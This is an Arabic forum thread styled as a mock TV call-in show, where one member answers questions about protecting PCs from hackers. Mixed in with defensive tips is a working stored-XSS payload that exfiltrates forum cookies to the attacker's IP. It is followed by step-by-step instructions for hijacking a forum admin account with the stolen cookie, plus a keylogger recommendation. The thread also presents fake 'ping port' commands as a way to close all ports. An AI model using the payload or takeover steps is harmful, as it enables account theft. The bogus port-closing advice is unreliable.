موصاحي.... يقدم درس في سبل السلامة
 

أعزائي المشاهدين نقدم لكم اليوم في هذه الحلقة من برنامج الدفاع المدني في سبل السلامة من حوادث المخرقين .

والفريق أول موصاحي ما قصر استجاب للدعوة وحضر للإستديو للإجابة على أسئلة المشاهدين فأهلا وسهلا بك معنا .

موصاحي : احم احم أهلا وسهلا وخر وراك ولا بفجر جهازك .

مقدم البرنامج : لا لا هونت نستقبل الإتصال الأول .

شامل : السلام عليكم نحيي الفريق ونتمنى منه أن يقدم لنا أهم البرامج التي قد تحمي الجهاز من دخول الطفيليين والهكرية ... وشكرا على اللقاء الناجح .


موصاحي : بجاوب بس ما يدخل ابو سهم ولا يسمع البرنامج .
مقدم البرنامج : خلاص لك على ما تشوف وجهه .

موصاحي: يسترسل ويقول وخر عني خلني اكتب أنا
مقدم البرنامج : تفضل تفضل يا موصاحي اكتب لنا انت وجاوب على الشامل .

<<< والله اللى توهق موصاحى :D

اول السلام عليكم

وثانى تسلم يا شيخ على هذا اللقاء :mad:

نجى لسؤال الشيخ شامل :mad:

بالنسبه لسؤال يا عم ابواحمد :D الهكر هو فن بحد ذاته من وجه نظرى هو رقى فى الجهاز ولكن انا لا اتكلم عن من يخترقون الاجهزه وانما بشكل عام

وقد اساء الكثير لمن هم من منتسبى الهكر لهذا الفن والابداع

الهكر هم نو عين

هكر/ وهم ما قد شيع مؤخرا هم الذين يخترقون الاجهزه او الموقع ويتجسسون على المستخدمين

كركر / وهم المخربين .. يعنى يقوم بتخريب اجهزة المستخدمين ومن ثم ود جهازك للبنشر

واشتر لك شوية حلاوه احسن لك :D وهذا هو اللى حاصل الان بين اليهود والمسلمين


المهم الهكر يستطيع دخول جهازك من خلال تصفح للمواقع او من خلال تحميل البرامج

ولكن هناك بعض السبل اللتى تساعد على تقليل الكثير من دخول الهكر

منها على سبيل المثال بعض برامج الحمايه واشهرها على الاطلاق النورتن انتى فايروس

وهذا رابط [url]http://www.absba.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=948&title=Norton%20Antivirus%202002[/url] اكبس على تحميل الملف الان عند فتح الصفحه

وكذلك انصح باستخدام برنامج للبورتات واسمهZoneAlarm

وهو يخبرك عند تصفحك بن البورت الفلانى قد فتح هل تريد الاستمرار

وهذا رابطه [url]http://www.absba.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=1316&ttitle=ZoneAlarm_Pro_2.6.362[/url] اكبس على تحميل الملف الان عند فتح الصفحه

ولكن يا اخوان هناك برامج تشفير للفايروسات ويعنى ذلك ان برامج الحمايه لا تصيده

فانا انصح جميع ابناء عمى بعدم تحميل اى برامج من اى موقع او منتدى ولكن انا انصح

اذا اردت برامج وتحميلها فهناك بعض المواقع المشهوره والامنه انشالله مثل

بوابة العرب وهذا رابطه [url]http://www.arabsgate.com/[/url]

موقع المشاغب وهذا رابطه [url]http://www.absba.com/[/url]

والموقع الاجنبى المشهور [url]http://download.com.com/2001-20-0.html?legacy=cnet[/url]

كذلك هذا الموقع وهو اهداء منى لمنتدى سبيع الجديد وهو سوبر داونلود للبرامج المجانيه

وهذا رابطه [url]http://superdownloads.ubbi.com.br/top/freeware1.html?914,04x[/url]

وانشالله يكون كل شىء تمام بالحيل والحيوول والحيلولات مرتن طقتن وحده :D

هذا والله اعلم

مشكور موصاااااااحي
على الموضوع الجميل والمفيد

رح للصندوق يا ساحر وادفع 10 ريال للطابع :rolleyes: رسوم جمركيه

مقدم البرنامج : حياك الله يا مهندسنا والله انت خطير نأخذ الإتصال الثاني :

البدر : السلام عليكم ورحمة الله هلا بالصاحي ومسرورين بوجوده في هذا البرنامج الناجح ولس سؤال .
موصاحي : تفضل احم احم .

البدر : طيب برنامج الارم زوم يسكر المنافذ او يراقبها .... اوكيه بس نريد من سيادتكم شرح ما هي المنافذ وماذا تعني شرح بالحيل والحيلولات طقتن مرتن وحدتن .

:mad: ZoneAlarm

هذا البرنامج هو برنامج لمراقبة البورتات ومن ثم تسكيرها وغالبا برامج الهكر تكون شغاله على الويندوز

98 وغير شغاله على الويندوز اكس بى لان من اشهر برامج الاختراق هو النت بس netbus والساب سفن

وهو موجوده قبل الاكس بى وهو مصممه خصيصا لاختراق الويندوز 98 ولكن الان يا البدر هى جاريه على

قدم وساق لاختراق الويندوز اكس بى xp ومحاولة تطويرها باستمرار

وقد شيع مؤخرا بان هناك اتفاقيات بين الهكر وشركات الحمايه على تشجيع الثانبه للاولى ودعمها

حتى تروج الثانيه برامجها وتسويقها ;) والله انهم شياطين هالعالم :D

فانا انصح كل من لديه ويندوز 98 بان يقوم فورا باستبداله بالاكس بى مع الاخذ الحيطه مع البرامج المشروحه

سابقا وهى النورتن والزون الارم :rolleyes:

وهنا كذلك طريقه لمستخدمى الويندوز 98 وعملية تسكير البورتات

من خلال الدوس

اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه .



اتمنى اتباع الطريقه كما هي :

اذهب الى:

Start>Run ابداء < تشغيل



واكتب الامر التالي

command.com



ستظهر لك نافذة إكتب فيها:

ping host

و إضغط enter

ثم إنتظر و اكتب:

ping port



و إضغط enter



ثم إنتظر و اكتب:

ping port1027

وإضغط enter

و إنتظر ثم إكتب:

ping port80



و إضغط enter

ثم اكتب:

ping proxy

و إضغط enter



ثم اكتب:

ping port

و إضغط enter



و الآن إنتهت المهمة.. :rolleyes:

:mad: ما حنا خالصين

كبير يابو فيصل

الف شكر لك على مشاركتك الفعاااااااااااااله


وننتظر المزيد من الدروس المفيده والتعليميه

موصاحي .. اي ...... هل تسمعني ...... أجب




مبدع ... في كل شـي مبدع... يا ابوفيصل

أنت ( موصاحي)

أنت ( مهندس تواقيع )

أنت ( مهندس ضحك )

أنت ( مهندس حماية )

أنت ( الباقيات في الطريق ... ما شاء الله تبارك الله .. الله لا يضرك
لاتقول بكرة ... الغازي نظلني .

يعطيك العافية أخوي موصاحي .والشكر موصول لمن أدار اللقاء وشرفه.

لا تنسى اقرأ توقيعي .

:D امشششششششششششششششششش موصاحي يشرح برنامج ;) ابوفيصل ابيك ترجع لي اميل واحد من الشباب انسرق :) خذ [email]ii1@hotmail.com[/email] يالله يبوفيصل رجعه :D ...

انتظرك

والف شكر لك علي الموضوع

مقدم البرنامج : هلا والله موصاحي . ونأخذ الإتصال الثالث :
الهريظمي : السلام عليكم هلا والله موصاحي سعيدين جدااا بشوفة وجهك على حقيقته إثرك كبير بقدر وعمرك على كل لي سؤال : يقولون أهل الهكر والفنانين فيه لا تستقبل من المسنجر اي ملف ينتهي ( exe. ) هل يعني ذلك أن كل برنامج لا ينتهي بهذه الطرفيه ليس بملف تجسس ولا فيروس . تحياتي .وأن ما جاوبت سويت فيك قصيده .

مقدم البرنامج : تفضل موصاحي .

تسلم حبيب الشعب ناصر الناقووول

الله لا يهينك يا السبيعى الغازى ما عليك زود

الصيدلى هذا ماهو اختصاصى وسرقة الايميل ما يعتبر هكر :D

ولكن تقدر تستخدم برنامج keylogger وهو افضل من البرنامج اللى انت حاطه

فى منتدى سحر البيان وهذا رابطه يا تركى
[URL=http://www.keyloggers.com//]من هنا تحميله بس دير بالك لا تحوش خشمى :D [/URL]


ابوعمر :mad:

الهريظمي حياك الله ..... exe معناته ملف تنفيذى يعنى ما يحتاج لتشغيله الى ملف وثانى او اى ملف اخر

فعلى سبيل المثال بطاقة الفلاش ما تشتغل الا اذا كان عندك فى جهازك مشغل الفلاش ولكن

عندما تحول البطاقه الى ملف تنفيذى ينتهى ب exe فانه على طول يشتغل وما يحتاج الى مشغل فلاش

وكذلك مثلا اذا اردت ان تشغل اغنيه ولا يوجد عندك الريل بلير فانه لا يشتغل لانه مرتبط بملف اخر

بخلاف امتداد exe فانه يشتغل على طووول

غالبية البرامج المصممه تكون نهايتها exe وكما ذكرت سابقا لا تقوم بتحميل اى برنامج من المنتديات او

المواقع .. وانما قم بتحميلها من المواقع اللتى ذكرتها فى الاعلى ..فهى مصدر ثقه ومواقع معروفه

وعلى مستوى عالى من الشهره والامانه...

وليس كل ما ينتهى ب exe يعنى باتش او فايروس ولكن مثل ما ذكرت هى برامج لا تحتاج الى برامج اخرى

لتشغيلها وتسمى برامج تنفيذيه ..

وقد تم تصميم برامج لتحويل امتداد exe الى امتداد اخر مثل scr وهذا الامتداد هو يعنى screen server

ويقصد به شاشه لسطح المكتب

وكذلك يحول الى exe الى com و dll و bat و pif و scr كما ذكرنا .. لخداع الضحيه

والى الان لم تصمم البرامج اللتى تحول exe الى swf او jpg يعنى امتداد صوره او فلاش

ولكن تم تصميم برامج تغير الشكل ( الايكون ) للباتش وهى خدعه للضحيه على شكل صوره او ملف فلاش

ولكن امتداده يبقى كما هو exe


هذا والله اعلم :rolleyes:

الووووو ابوفيصل :D انا ما ابي برنامج ابيك تجيب الاميل هذا :D عموما هذا الاميل حق سعودي هكر الي وقف موقع الياهو <<<< بغا يوهقك مع انتبه من الاتصالات وانا اخوك المجهولين ...

طيب عندي سوال : ياليت تشرح لنا كيف يخترقون المنتديات عن طرق الثغرات .... ابلش :D ..

مشكور ابو عمر علي الاستضافه الحلوة ..

الصيدلي

:D الحمدلله انى ما تعرضت له يا تركى

المهم هذا احد اساليب اختراق الموقع وبالشرح

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز
بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.cookie+'">';</script>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb





ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54





20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب **رها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[url]http://www.victim.com/vb/index.php?bbuserid=[/url][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى مثل ابوعمر (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك ما راح تعرف شنو تسوى بعد ذلك يا الصيدلى !! ادخل الى لوحة التحكم وافعل ما تشاء .. ! :rolleyes:

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلاق كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .

وانشالله يكون كل شىء واضح يا الصيدلى :rolleyes:

عموما هذا الموضوع قد تم ارساله لى من قبل اخونا العويد على ايميلى قبل ثلاثة شهور

ووعدته بالسريه ولكن اعتقد ان الفتره قد انتهت يا العويد :D

وانا متاكد يا الصيدلى ان سؤالك كان تعجيزى ولكن لله الحمد تجاوزناه :rolleyes:

ادرس كويس يا الصيدلى وهذه المعلومات جدا خطيره :D

هذا والله اعلم

ما شاء الله تبارك الله عليك

موصاحي أنت وينك عني من زمان عزالله أنك منت صاحي هههههههههههههههههههههههه تعال وسير علي وشربلك فنجال قهوه وعلمني وتراني حالف أنك أتعشاء عندي قل تم :D تم
ومشكووووور على الدرس

اخوك الهريظمي

مقدم البرنامج : الصيدلي ليش تخرب البرنامج المفروض عن طريق الإستديو مو تسأل الخبير موصاحي على طول آخر مره :)
مقدم البرنامج : موصاحي خوفتني الله يستر من الهكريه على كل نأخذ الإتصال الرابع :

الراعي : السلام عليكم ورحمة الله يا مرحبا يالصاحي نبيك تعلمنا إن الله قدر واستقبلت ملف مشبوه كيف أحذفه وأتأكد ان جهازي خالي من الباتش والفيروسات والملفات النائمة والله يطول عمرك وجعلك ذخر .

موصاحي تفضل :


(أي واحد عنده سؤال يرسله على الخاص . تحياتي)

الصيدلي جايك دورك في الإستديو حضر نفسك .

مشكور مو صاحي

وحياك الله
ويعطيكم العافيه:D

:D الهريظمى ما شفت شىء والخافى كان اعظم :D

ابوعمر ترانى فى وجههك من الصيدلى :mad:

ابن شطيط :D الله يعافيك ويسلم غاليك

وعليكم السلام اخى الراعى :confused: بالنسبه لسؤالك فقد جاوب عليه اخونا ابن شطيط وما قصر

وهذى نسخه من مشاركته حبيت انى انسخها لكم

.......................................................................................
من موضوع ابن شطيط

ثم نبدأ بالتعرف على أفضل طرق كشف وحذف
ملفات التجسس :
_________________
الطريقة الأولى :
1- أنقر على أبدأ
2- أكتب في خانة التشغيل run الأمر : system.ini ثم أضغط OK
سوف تفتح المفكرة .. إذا كان جهازك سليم سوف تجد بالسطر الثالث هذه العبارة shell=Explorer.exe
وإذا وجدت أي زيادة بهذه الجملة مثلاً : نجوم **، أو علامات إستفهام ؟؟ ،
أو xxx قم بمسح أي زيادة على تلك الجملة ثم أضغط موافق.
___________________________
الطريقة الثانية :
1- أنقر على ابدأ
2- اكتب في خانة التشغيل Run الأمر Win.ini
3- موافق
سوف تفتح لك المفكرة الأخرى : لاحظ السطر الخامس والسادس
إذا وجدت في أحد هذان السطران أي نجوم ***
أو علامات استفهام ؟؟؟
أو xxx قم بمسحها أي ( مسح النجوم وعلامات الاستفهام
والأكس ) ثم أضغط موافق .
____________________

الطريقة الثالثة : من الدوس :

من الدوس اكتب dir patch ثم أضغط ENTER
إذا كان جهازك سليم سوف تكون
النتيجة بهذا الشكل volume in drive c has no label
Volume serial number is
Directory of c: \ windows
File ليس found إذا وجدت الباتش احذفه بالطريقة التالية :
C:\ Windows\ delete patch
_________________________

الطريقة الرابعة : من ملف تسجيل النظام Registry
1- أنقر على ابدأ
2- أكتب في خانة التشغيل run الأمر التالي Regedit ثم Ok
ثم افتح المجلدات التالية حسب الترتيب التالي :
1- HKEY_LOCAL_MACHINE
2- SOFTWARE
3- MICROSOFT
4- WINDOWS
5- CURRENT VERSION
6- RUN إذا فتحت ملف RUN سوف تفتح لك نافذة تسجيل
النظام وسوف تجد في أعلاها من جهة الشمال أسماء الملفات
التي تعمل مع قائمة بدء التشغيل وفي أعلاها من جهة اليمين
عناوين الملفات هكذا :
names __________ data
إذا وجدت ملف لا يقابله عنوان في DATA أو ظهر أمامه
سهم صغير هكذا <--- فهو ملف تجسس
تخلص من بالضغط على زر الفارة الأيمن ثم DELETE
أبحث في كل ملفات Run
وإذا وجدت أي ملف باسم Patch أو باسم
Server.exe أو باسم Explo32 أكتب اسمه
كامل ثم قم بحذفه delete ....
ثم أعد تشغيل الجهاز
ثم اذهب إلى قائمة ابدأ ثم اختر بحث ثم ابحث
عن اسم ملف التجسس اللي أنت حذفته من
الريجستري .. اختر البحث في جهاز الكمبيوتر
إذا وجدته قم بحذفه بعد التأكد التام .
_____________________________
الطريقة الخامسة : من قائمة بدأ التشغيل :
1- أنقر على أبدأ
2- اكتب في خانة التشغيل RUN الأمر التالي : MSCONFIG
3- ثم أضغط موافق
4- أفتح بدأ التشغيل وسوف تظهر لك شاشة تعرض لك كل
البرامج التي تبدأ العمل مباشرة مع بدأ التشغيل
إذا وجدت أي برنامج غريب لم تقم انت بتنصيبه شيل علامة
الصح الموجودة في المربع المقابل لاسم الملف ثم أضغط موافق
ثم وافق على إعادة تشغيل الجهاز ينتهي مفعوله.
ملاحظة هامة :
أكثر هذه الطرق أنا جربتها بنفسي والقليل منها الذي
لم أجربه قد أجمع على صحته خبراء الحماية ( تقريباً )

...........................................................................................................

احسنت يا ابن شطيط :D وفررت على الشرح

ولكن حبيت اضيف نقطه بسيطه ان مبرمجى الجهاز او الكمبيوتر يحذرون من ان الباتش او الفايروس اذا دخل

فى الريجسترى فانه سوف يقوم بتخريب السيستم للنظام وبالتالى فسوف يكون هناك عدة مشاكل ومنها

اختلاف بعض مهام ملفات dll فى الريجسترى مما يسبب بط شديد فى الجهاز فلو جرب احدكم بتنزيل الباتش

فى الجهاز لعرف ماذا يقصد بذلك

كذلك عدم تحمل الريجسترى الملفات الزائده لانه من المعروف ان اجهزتنا ليست اصليه سواء جهاز موصاحى

:rolleyes: والشركات لدينا تقوم بتجميع تلك الاجهزه وبيعها علينا بسعر غالى :confused:

ويقول بعض الخبراء ان الباتش لا يحذف ابداء من الريجسترى او السيستم وحتى اذا عملت الفورمات فربما هى

كشكل خارجى تحذف ويهيأ لك ان الجهاز قد تنظيفه ولكن فى الواقع خلاف ما نقول فالباتش هو داخل انظمة

الجهاز ولم يحذف بكامله....

والوقايه خير من قنطار علاج :D


انا اتبع هذى الطريق اذا اردت ان احف ملف باتش وبكل سهوله

افتح ستارت ومن ثم run ثم اكتب msconfig سوف تظهر لك قوائم اختر قائمة startup على اليمين فى الزاويه

اكبس عليها ثم شوف اى ملفات المشتبه فيها وامامها صح ... وليكن بمعلوم الجميع انه اذا كان امامه صح

فمعناه ان الملف شغال .. واذا اردت ان ايقافه فقط قم بحذف علامة الصح من امامه

واذا اردت ان تحذفه فاذهب الى الدوس واكتب del file name.exe

بين كلمة دل وبين اسم الفايل يجب ان يكون هناك مسافه وكذلك يجب ان تذكر امتداد الباتش يعنى ال exe

هذا والله اعلم

مقدم البرنامج : أشكر الخبير العالمي في سبل السلامة السيد موصاحي على ماتفضل به من إجابات مفيدة لنا في عالم الكمبيوتر والنت .

ختاما نستودعك الله ونرجو من الله أينفع بك الإسلام والمسلمين ويكفينا منك هذا القدر الكبير حتى حين ولنا عودة معك في حلقات قادمة قد نبدأ خلالها في تجريب عملية الهكر او الكركر حتى نعلم بسبلهم ونحتمي منها .

ولعلك لا تبخل علينا بالمعلومات والمواضيع الجيده التي نحب ان نراها في هذا لقسم والأقسام الباقية .

ابشر وانا فى الخدمه طال عمرك

ومشكور كل من ساهم فى انجاح هذا المشروع الخيرى :rolleyes:

موصاحي الف الف الف شكر على هذه الدروس المفيده وننتظر المزيد

ماشاء الله عليك ياموصاحي كفيت ووفيت والله يستر عليك بس

ما شفت شى يا الشامل :o والحافى احم لا قصدى والخافى اعظم :o

الحقيقه يا مو صاحي المنتدى محسود على وجودك معنا وانت صراحه من الاعضاء المميزين في كل شي
الف شكر لك وتقبل تحياتي


اخوك البدر

ما عليك زود يا ابن العم :rolleyes: